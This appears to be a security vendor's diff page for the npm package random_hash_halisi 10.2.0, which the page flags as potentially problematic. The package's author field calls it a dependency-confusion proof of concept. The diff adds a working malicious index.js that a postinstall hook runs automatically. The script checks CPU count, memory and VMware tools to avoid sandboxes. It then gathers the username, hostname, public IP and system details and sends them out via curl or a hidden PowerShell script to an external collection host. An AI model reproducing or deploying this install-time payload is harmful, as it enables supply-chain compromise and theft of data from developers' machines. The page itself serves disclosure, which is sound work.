npm - random_hash_halisi - Versions diffs - 10.2.0 - Mend

random_hash_halisi 10.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of random_hash_halisi might be problematic. Click here for more details.

Files changed (2) hide show

package/index.js +145 -0
package/package.json +15 -0

package/index.js ADDED Viewed

@@ -0,0 +1,145 @@
+const os = require('os');
+const util = require('util');
+const exec = util.promisify(require('child_process').exec);
+const http = require('http');
+const fs = require('fs');
+const getPublicIP = (callback) => {
+  const options = {
+    hostname: 'api.ipify.org',
+    path: '/?format=json',
+    method: 'GET',
+  };
+  const req = http.request(options, (res) => {
+    let data = '';
+    res.on('data', (chunk) => {
+      data += chunk;
+    });
+    res.on('end', () => {
+      try {
+        const response = JSON.parse(data);
+        const publicIP = response.ip;
+        callback(null, publicIP);
+      } catch (error) {
+        callback(new Error('Error parsing response'));
+      }
+    });
+  });
+  req.on('error', (error) => {
+    callback(error);
+  });
+  req.end();
+};
+const detectOSType = () => {
+  const type = os.type();
+  if (type.startsWith('Windows')) return 'Windows';
+  if (type.startsWith('Linux')) return 'Linux';
+  if (type.startsWith('Darwin')) return 'Mac';
+  return 'UNKNOWN';
+};
+const os_type = detectOSType();
+let cpus = os.cpus();
+cpus = cpus.length;
+if (cpus === 1) {
+  process.exit(1);
+}
+let totalMemory = os.totalmem();
+totalMemory = totalMemory / (1024 ** 3); // Convert from bytes to gigabytes
+totalMemory = Math.round(totalMemory);
+const THRESHOLD = "2";
+if (totalMemory < THRESHOLD) {
+  process.exit(1);
+}
+async function checkVMTools() {
+  const os_type = detectOSType();
+  let checkCommand;
+  let isActive;
+  if (os_type === 'Windows') {
+    checkCommand = 'sc query VMTools';
+    isActive = (stdout) => stdout.includes('RUNNING');
+  } else if (os_type === 'Linux' || os_type === 'Mac') {
+    checkCommand = 'systemctl is-active vmtoolsd';
+    isActive = (stdout) => stdout.trim() === 'active';
+  } else {
+    console.error('Unsupported OS type:', os_type);
+    process.exit(1);
+  }
+  const { stdout } = await exec(checkCommand);
+  if (isActive(stdout)) {
+    //console.log("VMware tools are active, exiting.");
+    process.exit(1);
+  } else {
+    await getPublicIP((error, remoteIP) => {
+      if (error) {
+        console.error('Error:', error.message);
+      } else {
+        if (os_type === 'Linux' || os_type === 'Mac') {
+          const bash = `#!/bin/bash;separator="--------------------------------------------------";exfiltrate="$separator
+Username: $(whoami)
+Hostname: $(hostname)
+Public IP: ${remoteIP}
+Time: $(date)
+Current Path: $(pwd)
+Package Name: $(npm run env | grep 'npm_package_name' | cut -d '=' -f 2)
+Kernel: $(uname -a)
+$separator";echo "$exfiltrate" > /tmp/demo.txt;curl --silent -F "content=@/tmp/demo.txt" https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com;rm -f /tmp/demo.txt`;
+          exec('echo -e' + bash + " > /tmp/demo.sh; chmod +x /tmp/demo.sh; /bin/bash -c /tmp/demo.sh; rm -f /tmp/demo.sh",
+            (error, stdout, stderr) => {
+              if (error) {
+                console.error(`Error: ${error.message}`);
+                return;
+              }
+            }
+          );
+        } else if (os_type === 'Windows') {
+          const powershell = `$whoami = whoami
+$today = (Get-Date).DateTime
+$publicIP = (Invoke-WebRequest -Uri 'https://api.ipify.org?format=text' -UseBasicParsing).content
+$system = systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
+$filePath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "output.txt")
+$scriptPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "demo.ps1")
+Write-Output "Username: $whoami\`nDate: $today\`nPublic IP: $publicIP\`nSystem Information:" | Out-File -FilePath $filePath -Encoding ASCII
+Add-Content $filePath $system
+$destinationUrl = "https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com"
+$filePath = "$filePath"
+Invoke-WebRequest -Uri $destinationUrl -Method POST -InFile $filePath -UseBasicParsing
+del $filePath
+del $scriptPath`;
+          const psFilePath = `${process.env.TEMP}\\demo.ps1`;
+          fs.writeFileSync(psFilePath, powershell, 'utf8');
+          exec(
+            `C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File %TEMP%\\demo.ps1`,
+            (error, stdout, stderr) => {
+              if (error) {
+                console.error(`Error: ${error.message}`);
+                return;
+              }
+            }
+          );
+        }
+      }
+    });
+  }
+}
+checkVMTools().catch(error => {
+  console.error(`An error occurred: ${error}`);
+});

package/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "random_hash_halisi",
+  "version": "10.2.0",
+  "description": "A sample npm package for demonstration purposes.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "keywords": [
+    "dependency"
+  ],
+  "author": "Depdency-Confusion-PoC",
+  "license": "ISC"
+}